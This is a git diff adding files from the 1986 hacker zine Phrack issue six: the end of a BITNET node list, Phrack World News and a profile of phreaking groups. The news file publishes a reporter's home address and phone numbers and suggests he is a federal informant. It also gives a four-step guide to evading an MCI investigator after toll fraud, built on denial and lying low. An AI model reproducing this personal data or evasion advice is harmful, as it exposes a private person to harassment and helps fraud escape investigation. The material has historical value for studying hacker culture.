+ELEULE11  Universidad de Leon, Spain                IBM VM/SP R1 2
+EOVUOV11  Universidad de Oviedo - C P.D.            IBM VM/SP R3 1
+IGECUNIV  Universita Genova                         VM/SP
+IMEUNIV   Universita Messina                        IBM VM/SP R3 1
+ICSUNIV   Universita' della Calabria                VM/SP
+IBGUNIV   Universita' di Bergamo Italy              IBM VM/SP R4
+IPRUNIV   Universita' di Parma, Italy               IBM VM/SP R2
+IRMUNISA  Universita' La Sapienza                   IBM VM/SP R4
+IRMECOSA  Universita' La Sapienza                   IBM VM/SP R3
+IRMINGSA  Universita' La Sapienza                   IBM VM/SP R3
+ITNCISCA  Universita' Trento, Italy                 DEC VMS 3 0
+DBIUNI11  Universitaet Bielefeld HRZ                VM/SP
+DHBRRZ45  Universitaet Bremen                       SIEMENS BS3000 MSP 20
+DDOHRZ21  Universitaet Dortmund                     IBM MVS/SP 1 3.3
+DERRZE0   Universitaet Erlangen                     CDC NOS 2
+DE0HRZ1A  Universitaet Essen                        IBM VM/SP R4
+DGIHRZ01  Universitaet Giessen                      NOS
+DHHUNI4   Universitaet Hamburg, Germany             SIEMENS BS3000 MSP 20
+DHHUNI1   Universitaet Hamburg, Germany             VM/SP R5
+DMZRZU5P  Universitaet Mainz, Germany               DEC VMS 4 5
+DSIHRZ51  Universitaet Siegen                       VMS
+DULRUU51  Universitaet Ulm, Germany                 DEC VMS 4 5
+DHDURZ2   Universitaets-Rechenzentrum               IBM MVS/SP 2 1.7
+DE0WTZ1A  Universitaetsklinikum Essen               IBM VM/SP R3
+CFRUNI52  Universite de Fribourg, Switz             DEC VMS 4 6
+CFRUNI53  Universite de Fribourg, Switz             DEC VMS 4 6
+UMTLVR    Universite de Montreal                    VMS V4 6
+FRUTRS51  Universite de Tours                       VAX VMS
+UQUEBEC   Universite du Quebec                      VM/CMS 3 1
+UQHULL    Universite Du Quebec A Hull               VMS
+FRP8V11   Universite Paris 8                        VM/SP
+CGEUGE51  University de Geneve                      DEC VMS
+UNCA205   University of Calgary Cyber               VSOS
+UDACSVM   University of Delaware                    VM/SP
+UDPLATO   University of Delaware Off of Instruct. TeNOS
+USCN      University of Georgia                     NOS
+UHVAX1    University of Houston                     VMS
+UHVAX8    University of Houston                     VMS
+ELROY     University of Houston                     VMS
+UHOU      University of Houston                     VMS
+UHCL2     University of Houston/CL                  VMS
+UHDVX2    University of Houston/Downtown            VMS
+UTKVM1    University of Tennessee                   VM/SP HPO
+UTOREPAS  University of Toronto                     VM/SP
+UTORONTO  University of Toronto                     VM/SP HPO 4 2
+UTORMVSB  University of Toronto                     MVS/XA 2 3
+UTORVM    University of Toronto                     VM/SP HPO 4 2
+UTORMED   University of Toronto
+UTOROISE  University of Toronto OISE                VMS
+SEUDAC21  Uppsala U Data Ctr                        IBM MVS/SP 1 3.0
+SEMAX51   Uppsala Univ, Sweden                      DEC VMS
+URIMVS    URI Academic Computer Center              MVS/SP
+URIACC    URI Academic Computer Center              VM/HPO5
+NCCIBM1   US EPA                                    MVS/XA-JES2
+USGSRESV  US Geological Survey ISD VAX              VMS
+GROGHE    USC - Groghe                              VMS
+USCMVSA   USC - System MVSA                         OS/VS2 MVS/XA
+USU       Utah State U                              VMS
+UTORCCIE  UTORCCIE                                  VM/SP
+UVSOL     UVic COMP UNIX                            SUN OS 3 2
+UWAFRODO  UW Radiation Oncology                     VMS
+UWARITA   UW San Diego RUAC                         VMS
+VALPO     Valparaiso Univ                           AOS
+VUENGVAX  Vanderbilt U Engineering Sch              VMS
+VUCTRVAX  Vanderbilt Univ CC                        VMS
+VUCTRVX1  Vanderbilt Univ CC                        VMS
+VUCTRVX2  Vanderbilt Univ CC                        VMS
+VUHHCL01  Vanderbilt Univ HHCL                      VMS
+VULIBS    Vanderbilt Univ Library                   IBM/DOS
+VUHEP     Vanderbilt Univ Physics                   VMS
+VANDVM1   Vanderbilt Univ. A&S                      VM/SP
+VANDVMS1  Vanderbilt Univ. Physics                  VMS
+VASPSY    Vassar Col Psych and Econ                 VMS
+VASSAR    Vassar College                            VMS
+VASCHU    Vassar College                            VMS
+VAS780    Vassar College                            VMS
+VILLVM    Villanova Univ                            VM/SP
+VUVAXCOM  Villanova Univ                            VMS
+VCUMVS    Virginia Common U Comp Ctr                MVS/SP
+VCUVM1    Virginia Common U IBM C.C                 VM/SP
+VCUJADE   Virginia Commonwealth Univ                VMS
+VCURUBY   Virginia Commonwealth Univ                VMS
+VCCSHOST  Virginia Community Coll Sys               MVS/JES2
+VTCS1     Virginia Tech (VPI)                       VMS
+VTMATH    Virginia Tech (VPI)                       VMS
+VTME      Virginia Tech (VPI)                       VMS
+VTSDA     Virginia Tech (VPI)                       VMS
+VTVAX3    Virginia Tech (VPI)                       VMS
+VTVAX5    Virginia Tech (VPI)                       VMS
+VTVM1     Virginia Tech (VPI)                       VM/SP
+VTVM2     Virginia Tech (VPI)                       VM/SP
+VTVM3     Virginia Tech (VPI)                       VM/SP
+VTHCL     Virginia Tech (VPI)                       VMS
+VTOPUS    Virginia Tech (VPI)                       ULTRIX-32 V2
+VTCNSVM1  Virginia Tech (VPI)                       VM/SP
+VTCC1     Virginia Tech (VPI)                       VMS
+BBRVKI51  VKI, Rhode-St-Genese, Belgium             VMS 4 7
+VOLCANI   Volcani Institute                         DEC VMS 4 5
+FINVTT    VTT, Finland                              DEC VMS 4 6
+JPNWAS00  Waseda Univ                               VM/SP
+WSUVM1    Washington State U Comp Ctr               VM/SP
+WSUVMS2   Washington State Univ - Comp. Srvs Ctr.   VMS
+WSUMATH   Washington State Univ - Math Dept         VMS
+WSUVMS1   Washington State Univ Comp Serv Ctr       VMS
+WUNET     Washington U St Louis                     VMS
+WUBLUE    Washington Univ                           MUSIC/SP
+WUGOLD    Washington Univ                           MUSIC/SP
+WUGREEN   Washington Univ                           MUSIC/SP
+WUMS      Washington Univ Med Sch                   VMS
+WUVMA     Washington University                     VM/SP
+WUVMC     Washington University                     VM/SP
+WUVMD     Washington University                     VM/SP
+WUVME     Washington University                     VM/SP
+WUVMF     Washington University                     VM/SP
+HDEDH1    Waterloopkundig Lab , Delft               VM/SP 4
+WAYNEST1  Wayne State Univ CC                       VM/SP
+WEIZMANN  Weizmann Inst Comp Ctr                    IBM VM/SP HPO R4 2
+WISVMS    Weizmann Inst Dept of Chem                DEC VMS 4 3
+WISDOM    Weizmann Inst Dept of Math                UNIX 4.2 BSD
+WESLEYAN  Wesleyan U Net Gate Comp Ctr              VMS
+WESLYN    Wesleyan University                       VMS
+WCU       West Chester Univ of PA                   VM/HPO
+WVNMVS    West Virginia Network                     MVS/XA
+WVNVAXA   West Virginia Network                     VMS
+WVNVAXB   West Virginia Network                     VMS
+WVNVM     West Virginia Network                     VM/SP
+WVNSVC    West Virginia Network                     VMS
+WVNVMS    West Virginia Network                     VMS
+WVNET     West Virginia Network                     VMS
+DMSWWU1A  Westfael Wilhelms-U Muenster              IBM VM/SP HPO R5 0
+DMSWWU2B  Westfael Wilhelms-U Muenster              IBM MVS/SP 1 3.5
+TWSUVM    Wichita State Univ CC                     VM/SP
+WLUCP6    Wilfred Laurier Univ                      CP-6
+WILLIAMA  Williams College CC                       VMS
+WILLIAMB  Williams College CC Admin VAX Sys         VMS
+WILLIAMS  Williams College Comp Ctr                 VMS
+DGOWISO1  WISO-RZ Uni Goettingen,Germany            IBM VM/IS R5
+WPI       Worcester Poly Tech EE                    ULTRIX
+IBRDVM1   World Bank                                VM/HPO
+WSU       Wright State Univ                         VMS
+AWIWUW11  WU-Wien                                   IBM VM/SP HPO R4 2
+WVNBSC    WVNET - Bluefield St Col                  VMS
+WVNCC     WVNET - Concord Col                       VMS
+WVNFSC    WVNET - Fairmont St Col                   VMS
+WVNGSC    WVNET - Glenville St Col                  VMS
+WVNNCC    WVNET - Northern Comm. Col                VMS
+WVNPCC    WVNET - Parkersburg Comm. Col             VMS
+WVNPSC    WVNET - Potomac State Col                 VMS
+WVNSC     WVNET - Shepherd Col                      VMS
+WVNSCC    WVNET - Southern Comm Col                 VMS
+WVNWLSC   WVNET - West Liberty St. Col              VMS
+WVNWVIT   WVNET - West VA Instit of Tech            VMS
+WVNWVSOM  WVNET - West VA Sch of Osteopathic Med    VMS
+WVNWVSC   WVNET - West Virginia St Col              VMS
+XAVIER    Xavier Univ Acad Comp Ctr                 VMS
+YALEMED   Yale Med Sch - Biomedical Comp Unit       VMS
+YALEADS   Yale U Admin Data Svcs                    VM/SP/HPO
+YALASTRO  Yale U Astronomy Dept                     VMS
+YALECS    Yale U Comp Sci Dept                      UNIX
+YALEMVS   Yale U Computer Ctr                       MVS/SP
+YALEVM    Yale U Computer Ctr                       VM/SP/HPO
+YALEVMS   Yale U Computer Ctr                       VMS
+YALPH2    Yale U HEP2                               VMS
+YALEHEP   Yale U Physics Lab                        VMS
+YALEZEUS  Yale Univ Med Sch                         VMS
+TRYILDIZ  Yildiz Univ                               VM/SP R3
+YUORION   York U Admin Stud Environ Sci             VMS
+YUSOL     York U Comp Sci Fac Sci                   VMS
+YUYETTI   York U Comp Sci Research                  UNIX BSD
+YULIBRA   York U Computing Services                 VMS
+YUVULCAN  York U Glendon Coll                       VMS
+YORKVM1   York University                           VM/SP
+YORKVM2   York University                           VM/SP
+YUGEMINI  York University                           VMS
+YUVENUS   York University                           VMS
+YSUA      Youngstown State Univ                     MVS/SP
+YSUB      Youngstown State Univ                     VM/SP
+DTUZDV5A  ZDV U Tuebingen                           VMS
+DK0ZA1    Zentralarch Sozialfors Koeln              VM/SP
+CZHRZU1A  Zurich U                                  IBM VM/SP
+CZHRZU2B  Zurich U                                  IBM MVS/SP
+                          PENDING NODES AS OF 10/05/88
+                                TOTAL NODES = 3
+
+
+Node      Site                                      System
+--------  ----------------------------------------  ---------------------------
+MHC       Mount Holyoke Coll                        ULTRIX
+RADFORD   Radford Univ                              AOS/VS
+WWU       Western Washington Univ                   BERKELEY UNIX
+=========================================================================
diff --git a/phrack6/13.txt b/phrack6/13.txt
new file mode 100644
index 0000000..36ff1d3
--- /dev/null
+++ b/phrack6/13.txt
@@ -0,0 +1,262 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Six, Phile 13 of 13
+
+-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
+
+                         *-=+^ Phrack World News ^+=-*
+
+                               Issue Five/Part 5
+
+                            Compiled and Written By
+
+                               Knight Lightning
+
+-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
+
+Daniel Zigmond: Real Reporter or Freelance FED?                    May 20, 1986
+-----------------------------------------------
+This article in no way endorses one view over the other, but will try to look
+at evidence and facts pertaining to both of the above statements.
+
+Daniel Zigmond;  Wants to write an article on hackers and phreaks, our general
+social atmosphere, and our side of the story.  He IS a contributing editor on
+the staff of Amiga World Magazine and he has lived at 6735 Forest Glen Road,
+Squrill Hill, Penn. and had the phone numbers (412)422-1979/7515 for at least 3
+years.  Reportedly he has accounts on ARPAnet, Private Sector, and Byte
+Magazine BBS.
+
+He has been on several conferences and been talking to several phreaks across
+the nation.  To name a few:  Blue Buccaneer, Cap/N/Crax, Compu-Phreak, Dark
+Cavalier, Dead Lord, Final Impulse, Holophax Phreaker, Knight Lightning, Ninja
+NYC, Scan Man, Sigmund Fraud, Slave Driver, The Bootleg, The Clashmaster, The
+Infiltrator, The Firelord, The Seker, and TUC.
+
+He tapes all his conversations and has tried to get people to call other
+phreaks on 3-ways in attempts to gain their phone numbers.  He did however make
+some attempts to help Sigmund Fraud after his near bust (see story in this
+issue).
+
+There are a few extremely odd things about Mr. Zigmond.
+
+1.  He wants everyone to send him their codes, extenders, PBXs, diverters, etc.
+    Even if they no longer work.  When asked why, he answered that he needed
+    something to show his boss so he wouldn't be turned down because of what
+    would seem to be a b.s. article.
+
+    Why doesn't he just make things up?  After all he said that the stuff
+    didn't have to be good.  His reply to that was that his boss might check a
+    few.  Well if they were dead codes or PBXs or whatever then he would be up
+    the creek anyway.
+
+    Ok, forgetting about that for a moment, Zigmond also asked that people
+    photocopy their notebooks and send those copies to him and that he would
+    pay the postage and for the photocopies.  This of course means he gets your
+    address and at the very least your township and such (that is if you don't
+    leave a return address) from the postmark.
+
+2.  He has refused to give out a phone number to reach him at work or at Amiga
+    World.  Furthermore, he doesn't plan to have the article in Amiga World,
+    but rather, he has stated that it would be sold to the Washington Post.
+
+    Now I talked with people at the Washington Post and they know nothing about
+    this.  I spoke with people in several different areas and turned a blank.
+    They didn't even know who Zigmond was.
+
+    This leaves 2 possibilities.  He either never really had any intention of
+    submitting this article to them or was just sort of running with the mouth
+    in search of glory and attention.
+
+3.  A PBX that Sigmund Fraud had found while hacking in a UNIX was given to
+    Zigmond.  It had never been used before, with the exception of a single
+    conference to test it out, and within a week of giving it to Zigmond it was
+    gone.
+
+4.  Another biggie is that Zigmond claims that by the time he submits this
+    article in August 1986 (to wherever) that if he gets $900 for it, he would
+    break even.  He is saying this from his phone bills and other expenses on
+    the article.
+
+    Now only breaking even after all that time, work, and effort seems a bit
+    worthless to me, why would he do it?  You know, they say that fed
+    informants get paid very well, not that I am suggesting that Zigmond is a
+    fed informant.
+-------------------------------------------------------------------------------
+Some other stuff that may be interesting to know is that Zigmond insists that
+he will be getting accounts to Metal Shop Private and Stronghold East when
+Taran King and Slave Driver have given very strong "no"s.  He goes around
+telling this to people.  His phone answering machine gives you less than ten
+seconds to leave a message, this is perhaps to prevent hacking, but
+nevertheless annoying.
+------------------------------------------------------------------------------
+Now please everyone take this file in the way it was intended.  This is not
+saying that Daniel Zigmond is helping the feds, he may be completely interested
+and wanting to learn about our society.  From this I gather that he will learn
+that in the phreak community we try to protect each other from getting busted
+and that a reporter like him could literally destroy the phreak world if he was
+working with the feds and left unquestioned and unchecked.
+
+This article is a warning to all who may contact Zigmond to use your own good
+judgement in dealing with him.  I'm sure that once he answers the questions
+raised in this article then everything will be alright.
+-------------------------------------------------------------------------------
+The only other thing I wanted to say is that in general reporters have hurt the
+phreak/hack world tremendously in the past.  They bring too much attention to
+the phreaks and bring us into the public eye.  As a result there has been much
+more legislation creating news laws against us.  Some examples are evident in
+this very issue of PWN.  Blue Buccaneer points out all sorts of things in
+the new hacking laws article.  Remember the new laws about sysops being
+responsible for the boards?  Did you see how that was used in the Teltec busts?
+It getting incredibly dangerous out there friends, lets try not to make it any
+worse.
+
+:Knight Lightning
+_______________________________________________________________________________
+
+Defeat Richard Proctor In 4 Easy Steps!                           June 10, 1986
+---------------------------------------
+Who is this new investigator Atlanta?  What makes him today's newest and
+possibly greatest threat to the phreak world?  The following information
+concerns an MCI investigator named Richard Proctor, alias; John Proctor.
+------------------------------------------------------------------------------
+Richard Proctor, who also introduces himself to others as John Proctor, is one
+of the various MCI investigators that now lurk the nation.  He is in charge of
+most of MCI's security/investigation divisions, and is in charge of running the
+southeast, east coast, and northeast MCI Investigations.  He has also been
+involved with phreaks in the midwest and southwest.
+
+I am not sure of the extent of his "jurisdiction," but all users of MCI should
+be careful no matter where they are located.  Holophax Phreaker and The
+Infiltrator can personally tell you how he runs the MCI Investigations as they
+have been under investigation twice to date.  Holophax Phreaker is currently
+still under investigation by Proctor and even by his own local Bell Operating
+Company (BOC).
+
+The first thing most investigators would do when they find an access code has
+been abused is to wait until it has a large bill to act upon it (which may
+never happen).  This is because it is unprofitable to the long distance service
+to try to find and prosecute a person who has made less than $500.00 worth of
+calls (depending on the LD service).
+
+Richard Proctor is a very different case.  As soon as he finds an access code
+is being abused, he will take immediate action.  The following is the series of
+events which will take place once Proctor discovers an abused account.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+In the following steps, "you" are the phreaker in question that was making the
+calls (heaven forbid).  The steps listed are for both "you" and the person(s)
+receiving the illegally made phone calls.
+
+Step 1:  Proctor will personally call *EVERY* destination number on the account
+         and ask for information on who called them on the date(s) the call(s)
+         were made.  If it is a bulletin board, he will contact the sysop by
+         voice or if there is no voice number available, he will send one or
+         more investigators from the nearest MCI Investigations Department to
+         question the sysop.  He will ask them for information pertaining to
+         the phreaker.  Hopefully, your amnesiac friends will somehow forget
+         all about you and be able to tell Proctor nothing.
+
+Step 2:  Proctor waits a couple of days, then he again contacts the person(s)
+         that received calls and says that he has found you and that you have
+         told him that the people "you" had been speaking with also made those
+         calls and that the Proctor will bust the person(s) who were called
+         unless they would like to pay for the calls.  (If this part pertains
+         to you, that is if you were the one who received calls and Proctor or
+         any agent said this then, at this point you should contact an attorney
+         as this is telephone harassment, a federal crime committed over an
+         interstate communications carrier, and you could sue MCI or whichever
+         company it involved).
+
+Step 3:  If some of the person(s) called by you weren't as amnesiac as you
+         would have liked when Proctor spoke to them and then Proctor calls you
+         or your parents, then you should deny everything that Proctor accuses
+         you of, no matter how many people he says turned you in.  Proctor will
+         be lying (one hopes) so deny everything.
+
+Step 4:  Proctor will call you again in a couple of days and tell you that you
+         have one last chance to turn yourself in.  When you say no again,
+         Proctor will try to scare you by telling you that MCI is going to make
+         an example of you and prosecute to the fullest extent.  If Proctor
+         does this, then you know he has no evidence on you or at most,
+         circumstantial evidence.
+
+You might get a couple of calls after that.  Keep denying it and make sure you
+drop out of phreaking for approximately 1 1/2 - 2 months. If you get a call
+from your local phone company then drop out for at least 6 months to a year.
+They will most likely put a pen register or a DNR on your line.
+
+Proctor has PhDs in Psychology and Criminal Psychology so be very careful!  He
+can't do anything to you if you follow the above guidelines unless he had a
+trace put on the account you were using.  If that is the case, then he will
+show up at your door arrest you.  Your best bet is to stay away from it
+entirely. Proctor's home phone is unlisted (of course), but his office number
+can be obtained from any MCI operator.
+
+                            Information Provided by
+                     Holophax Phreaker and The Infiltrator
+_______________________________________________________________________________
+
+Quick Notes
+-----------
+Stronghold East is now running on a new Apple //e thanks to their friends at
+AMEX.  They formally ran SE off of a Franklin Ace.              May 3, 1986
+Most recently the hard drive at SE crashed and until they acquire the new
+ProDos Apple net, they will be running Phlash-Net written by Phlash Gordon.
+-------------------------------------------------------------------------------
+Rumor has it that the Apple Wizard was busted for dealing and using coke.
+-------------------------------------------------------------------------------
+A guy named the CPTN was busted in Nevada for something pertaining to the
+Captain Midnight incident.  He was also busted for carding and was caught with
+illegally obtained modems.                                 Info by Death Angel.
+-------------------------------------------------------------------------------
+A member of the Underworld Elite, run by Night Stalker, got busted for calling
+the White House and making a bomb threat.  The Secret Service came to his house
+and they knew he used illegal extenders to make the calls.  This user decided
+to give them the number and his passwords to the Underworld Elite.  He was
+deleted.          Info by Night Stalker, 5/11/86...The Underworld (216)356-9464
+-------------------------------------------------------------------------------
+Telenet Bob was busted. The full story appeared in the April issue of 2600
+Magazine.  Nineteen year old from New Jersey.  Name Robert Davenport.  $500
+fine, $890 restitution to AT&T.                Info by Sally Ride:::Space Cadet
+-------------------------------------------------------------------------------
+Bad Boy In Black has given up BBSing and Phreaking (for the most part) so you
+probably won't be hearing from him again. He claims he has gotten bored of
+BBSing and have had little time since the summer is rolling around. Therefore,
+he decided to give it up all together.       Info by [bad boy in black] 5/11/86
+-------------------------------------------------------------------------------
+Shooting Shark has also left the phreak world for the more or less same
+reasons plus the fact that he is going to college.      Info by Shooting Shark.
+-------------------------------------------------------------------------------
+In Texas, some cop was running a bbs called the Tunnel.  No one was busted, but
+names and handles of those posting illegal codes were collected. The cop has
+received several death threats.
+-------------------------------------------------------------------------------
+The Slayer was busted on April 25, 1986.  Reportedly he was visited by agents
+from Metrophone, MCI, New Jersey Bell, and the FBI.  His bust concerned Metro
+abuse.  The Godfather, in Rhode Island, was also linked to this bust as well
+and as of now has quite the phreak world, but no further information is
+available on that.  Most recently it has been discovered that the Slayer has
+been hired as a TSPS operator.
+-------------------------------------------------------------------------------
+More news on The Sprinter here; after all was said and done, Sprinter plea
+bargained (as expected) and plead guilty to the charges.  He spent 14 days in
+jail, has a $2000 fine, 2 years probation, 200 hours community service, and of
+course those lawyer costs.  He at this point has not accepted a job with
+MicroSoft.                                               Info by Jester Sluggo.
+-------------------------------------------------------------------------------
+It has been reported that The Mentor and Crustaceo Mutoid are now writing for
+a newsletter in California called The Underground Informer.
+-------------------------------------------------------------------------------
+The Arabian Knight was busted for conferencing.
+-------------------------------------------------------------------------------
+The Guardian Demon (215) was apparently busted for Metrophone abuse, but formal
+charges have not been brought forth.
+-------------------------------------------------------------------------------
+Jester Sluggo has officially retired from all board calling and is now into
+straight hacking.  He will maintain his contacts in the phreak world.  Sysops
+are asked to remove his accounts.
+_______________________________________________________________________________
+
+
+
+=========================================================================
+
diff --git a/phrack6/2.txt b/phrack6/2.txt
new file mode 100644
index 0000000..5f0223f
--- /dev/null
+++ b/phrack6/2.txt
@@ -0,0 +1,291 @@
+                                ==Phrack Inc.==
+
+                     Volume One, Issue Six, Phile 2 of 13
+
+\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\
+
+                              Phrack Pro-Phile 3
+
+                       Featuring:  User Groups and Clubs
+
+                                  Written By
+                        Knight Lightning and Taran King
+
+                               On June 10, 1986
+
+\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\
+Welcome to issue 3 of Phrack Pro-Phile.  The information herein was originally
+supposed to appear as a special issue of PWN, but instead was made this issue's
+Phrack Pro-Phile.  Taran King and I have collected much information about the
+different clubs and groups of today and yesterday and compiled in the form that
+you will now see.
+\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\
+Extasyy Elite:  The story of Extasyy Elite is a sad one for the group was
+                literally destroyed by its own members.  The Poltergeist turned
+                in all of Extasyy after he got busted for carding.  This led
+                the authorities to The Mentor who had stolen 30 Apple //es.
+                Mentor's bust almost led to The Protestor, but luckily, The
+                Mentor was able to warn Protestor in time.  (See Phrack World
+                News Issue III).
+
+The membership of the club included:
+
+                  Bit Blitz                    Cisban Evil Priest
+                  Crustaceo Mutoid             Kleptic Wizard
+                  The Mentor                   The Poltergeist
+                  The Protestor
+
+
+Crustaceo Mutoid later joined the Racketeers, but now he and The Mentor write
+for a California newsletter called the Underground Informer.
+
+         Extasyy hung out on Hack Net BBS and FWSO, a bbs in Colorado.
+-------------------------------------------------------------------------------
+Fargo 4A:  This group was started on a conference consisting of Bioc Agent 003,
+           TUC, Big Brother, Quasi-Moto, Video Warhead, and the Wizard of
+           Arpanet.  What they did was get several Directory Assistants on the
+           conference, and each person assumed a role of some sort of telco
+           agent.  Now they told the DA's that all their calls were going to be
+           re-routed to a different location.  They got some of the DA's to
+           believe them, and some of them were almost laid off because of this
+           conference.  By the way, Fargo is in North Dakota, that's where the
+           first DA was from.
+
+           It is believed that Wizard of ARPAnet was busted by John Maxfield
+           and that BIOC completely retired from the phreak world.  This group
+           was unofficially disbanded, but several of the members are still
+           active.
+-------------------------------------------------------------------------------
+Five-O:  A reasonably new IBM kracking group, which was formally the Imperial
+         Warlords.  Currently they are re-kracking software and claiming it to
+         be original by themselves.  They are known for placing insulting
+         messages towards certain people inside their re-kracked software.
+-------------------------------------------------------------------------------
+IBM Syndicate:  This group was formed around April 6, 1986.  Its charter
+                members included; Dark Creaper (916), Brew Associates (215),
+                Major Havoc (301), and one other whose handle remains unknown
+                to me at the current time.  They were a new phreak/hack/pirate
+                group.  Unfortunately, this group (like so many others) died
+                within its first month.
+-------------------------------------------------------------------------------
+Icub (International Computer Underground Bandits):
+
+     This is a hack/phreak group who's main emphasis is on phreaking.  It is
+     based in Memphis, Tennessee.  It has 10 members in it, and the only
+     semi-active member left is Doc Holiday.  Not much else is really known
+     about this group except that it is inactive and there have not been any
+     announced plans to revive it.
+-------------------------------------------------------------------------------
+LOD/H:  Legion Of Doom/Hackers
+
+        These two groups are very closely intertwined.  They both were formed
+        on Plovernet. The founding member was Lex Luthor.  Through the years,
+        there have been LOD/H bulletin boards such as Blottoland, LOD, FOD,
+        etc.  Today there is Catch 22 and a new LOD bbs, supposedly being run
+        by King Blotto.  The current member list of the group is as follows:
+
+             Legion Of Hackers                      Legion Of Doom
+             -----------------                      --------------
+             Blue Archer                            Phucked Agent 04
+             Gary Seven                             Compu-Phreak
+             Kerrang Khan
+             Lex Luthor
+             Master Of Impact
+             Silver Spy (Sysop of Catch 22)
+             The Marauder
+             The Videosmith
+
+LOD/H is known for being one of the oldest and most knowledgeable of all
+groups.  In the past they have written many extensive g-philes about various
+topics.  (Please forgive any mistakes in the member list since this list was
+provided by Lex Luthor approximately 1 1/2 - 2 months ago).
+-------------------------------------------------------------------------------
+Metal Communications: A very large group that has written many files throughout
+                      its existence.  Some of the boards in its menagerie
+                      include Speed Demon Elite, Metal AE, Metal Works AE,
+                      Metalland I and several others. The membership of Metal
+                      Communications includes:
+
+Cobalt 60/Crimson Pirate/Dr. Local/Red Pirate/Shadow Lord/The Angel Of Destiny
+ The Apothecary/The Byte/The Byte Byter/The Dark Wizard/The Duke/The Dutchman
+The Man In Black/The Prophet/The Pink Panther/The Voice Over/The Radical Rocker
+                         The Warlock Lord/White Knight
+
+Red Pirate, Crimson Pirate, and Dr. Local are the group's main ware
+distributors.
+
+A subsidiary of Metal Communications is the Neon Knights whose membership
+includes:
+
+    Baby Demon/Jolly*Roger/The Blade aka Killer Kurt/The Master of Reality
+                     The Metallian/The Outland/Zandar Zan
+-------------------------------------------------------------------------------
+PAG/PAP: Phreaks Against Geeks/Phreaks Against Phreaks Against Geeks
+
+         PAG:  This group was formed by TWCB Inc. as a joke on a conference in
+               December, 1985.  The charter members were TWCB, Inc.  taRfruS,
+               Blue Adept, The Clashmaster and a few others.  Later, Catcher in
+               the Rye and the Slovak wanted to join.
+
+         PAP:  In resistance to PAG, Boston Stangler and Micro Man formed PAP.
+               Several others sided with them but were never formal members.
+
+All of this nonsense was really started on the Dartmouth system and was mainly
+a feud between phreaks in the Boston (617) area until TWCB got involved.
+-------------------------------------------------------------------------------
+The Administration:  This group was sort of in two parts; The Administration
+                     and Team Hackers '86.  The membership of these groups
+                     include:
+
+                  Adolph Hitler...............Team Hackers '86
+                  Alpha Centauri
+                  Author Unknown..............Team Hackers '86
+                  British Bloke...............Team Hackers '86
+                  Dark Priest
+                  David Lightman (214)........Administration Leader/
+                                              Team Hackers '86
+                  Dr. Pepper
+                  Hewlett Hackard
+                  Major Havock................Team Hackers '86
+                  Mane Phrame
+                  Mark Twain
+                  Phoneline Phantom 1 - *Not* a member of Phoneline Phantoms.
+                  Red Baron
+                  Renegade Rebel
+                  Sasha Kinski................Team Hackers '86
+                  The President
+                  Walter Mitty
+
+The group did disband temporarily for reasons dealing with security, but now is
+back together.  For other news about this group see the current PWN.
+-------------------------------------------------------------------------------
+The Nihilist Order:  This group was really a loosely connected bunch of friends
+                     and phreaks and not a true club.  It is based in Fremont
+                     and Sunnyvale, California.  It was started by TRASk and
+                     The Highwayman.  The membership includes:
+
+             BelGarion/Ogre Ogre/The Animator/The Highwayman/TRASk
+
+All of the members of the group have been busted or been involved in busts in
+the past few months.  The Highwayman bit it in the Phoenix Phortress Sting
+Operation, and the others all got caught on a carding scam.  Although BelGarion
+was later released with no record.
+
+One of the boards in the Nihilist Order's network is the Shattered World Elite,
+which is sysoped by TRASk.  The group is currently inactive.
+-------------------------------------------------------------------------------
+The P.H.I.R.M.:  A somewhat new group that recently has been accused (without
+                 proof) of being fed invested.
+
+                 Not much is really known about this group as they would
+                 disclose very little information.  Some of the boards that are
+                 now P.H.I.R.M operated include Thieve's Underworld, sysoped by
+                 Jack The Ripper, World's Grave Elite sysoped by Sir Gamelord,
+                 and SATCOM IV.
+
+                 The P.H.I.R.M. reportedly will be releasing a newsletter.
+
+                 The membership of the P.H.I.R.M. supposedly includes:
+
+                    Archangel                  Blade Runner
+                    Jack The Ripper            Sir Gamelord
+                    The Stingray
+
+                It is rumored that Blade Runner is the same person as
+                Archangel and/or The Stingray.
+-------------------------------------------------------------------------------
+TPM (The Punk Mafia):  This group when last checked had eight members.  The
+                       following is a complete listing.
+
+                 Arthur Dent                    Creative Chaos
+                 Erik Bloodaxe                  Gin Fizz
+                 Ninja NYC                      Peter Gunn
+                 Rudolph Smith (703)            The Godfather (703)
+
+The group will be going through a rebirth this summer.  Their main goals
+include burglary, fraud, hacking, and phreaking.  Most recently The Godfather
+retired and Ninja NYC came very close to being busted.  See Phrack World News
+Issue V.
+-------------------------------------------------------------------------------
+The Racketeers:  The new Apple pirating group was assembled by Apple Rebel. The
+                 membership now includes:
+
+         Apple Rebel/Crustaceo Mutoid/Hot Rod/The Micron/The Warezird
+-------------------------------------------------------------------------------
+Tribunal Of Knowledge:  This group was formed very recently by Blue Buccaneer
+                        and High Evolutionary with one purpose in mind:  to get
+                        together to trade knowledge and information and to
+                        discuss this information until all the members had a
+                        good working knowledge of it.  The final result would
+                        be g-philes written by the group about the topic.  On
+                        the whole it was a good idea.
+
+      The complete membership includes:
+
+                    Blue Buccaneer          Chef Boy R Dee
+                    Cyclone II              High Evolutionary
+                    Night Stalker           Paradox
+                    Professor Pixel         Slave Driver
+                    The Inspectre           The Seker
+                    The Wild Phreak
+-------------------------------------------------------------------------------
+2300 Club:  Based in Cleveland, Ohio.  The 2300 Club is now being compared and
+            treated as miniature mafia by local authorities.  This is mainly
+            for crimes including the blowing up of cars.  Two of the members
+            were caught for fraudulent use of a credit card and one has been
+            arrested for car theft.  Which of the members that refers to, I
+            don't know, but the membership of the 2300 Club included:
+
+                    Dr. Gorey                       Dr. No
